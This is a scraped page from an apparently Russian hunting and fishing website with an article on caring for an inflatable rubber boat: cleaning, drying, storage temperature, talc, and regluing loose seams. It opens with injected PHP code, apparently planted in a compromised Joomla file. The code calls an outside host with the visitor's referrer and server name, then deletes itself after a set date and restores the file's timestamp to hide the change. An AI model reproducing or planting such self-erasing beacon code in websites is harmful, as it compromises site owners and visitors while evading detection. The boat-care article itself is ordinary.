check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Ухаживаем за резиновой лодкой

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 4003 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Ухаживаем за резиновой лодкой

Резиновая лодка. Для настоящего рыбака – это не просто плавсредство, а инструмент для получения хорошего улова. А задумываемся ли мы над тем, как за ней ухаживать? Что делать после того, как закончился сезон? Об этом и поговорим.


Правила хранения

Чтобы к следующему рыболовному сезону не обнаружить сюрпризов, научимся правильно беречь резиновую лодку или вспомним основные моменты ее профилактики.

1. После удачного заплыва удаляйте водоросли, чешую, грязь и прочие прелести. Мягкой тряпкой, не забывая про углы. Мыть можно только холодной или теплой водой. Материал рассчитан на контакт именно с такими температурами. Средство для посуды допускается.
2. После процедуры – обязательная просушка. Опять же, внимание на углы. Иначе можно запустить процесс гниения.
3. Обязательное наличие качественной упаковки.
4. Оптимальная температура для сохранности помощницы – 15-20 градусов, с плюсом. Холод плохо влияет на резиновые изделия.
5. Раскладывать и собирать лодку необходимо несколько раз при длительном хранении. Например, зимой.
6. Тальк очень хорошо действует. Сыпать нужно внутри и снаружи. Он не допустит склеивания.
Нехитрые приемы, а сколько пользы.

Профилактика швов

В процессе эксплуатации довольно часто хозяин сталкивается с тем, что накладки на швах постепенно отходят. Безусловно, это не такая большая проблема, как сломанный гребной винт на судне экстра-класса. Тем не менее, она доставляет массу неприятностей. При несвоевременном устранении может произойти авария. Разгерметизация в процессе клева? Бывает и такое.

Поэтому, при сушке лодки обратите внимание на состояние швов. Обнаружили отошедшие участки? Не махайте рукой и ремонтируйте, если нет желания однажды плыть в снаряжении на берег своим ходом.

Операция проводится в сухом помещении. Накачайте лодку до полного рабочего состояния, обработайте поверхность наждачной бумагой (тонкой). Лучше использовать клей, который шел в комплекте. Но подойдет и любой другой для резины.

Уголком плотной бумаги или картона нанесите клей на поверхности и прижмите. Осмотрите остальные швы и устраните проблемные места. Оставляем «пациента» в надутом состоянии на пару часов, спускаем баллоны и укладываем на хранение.

Опытные рыбаки, возможно, улыбнутся. Но вспомнить о таких простых рекомендациях никогда не помещает даже настоящим профи. Как говорится: «И на старуху…».

 

AddThis Social Bookmark Button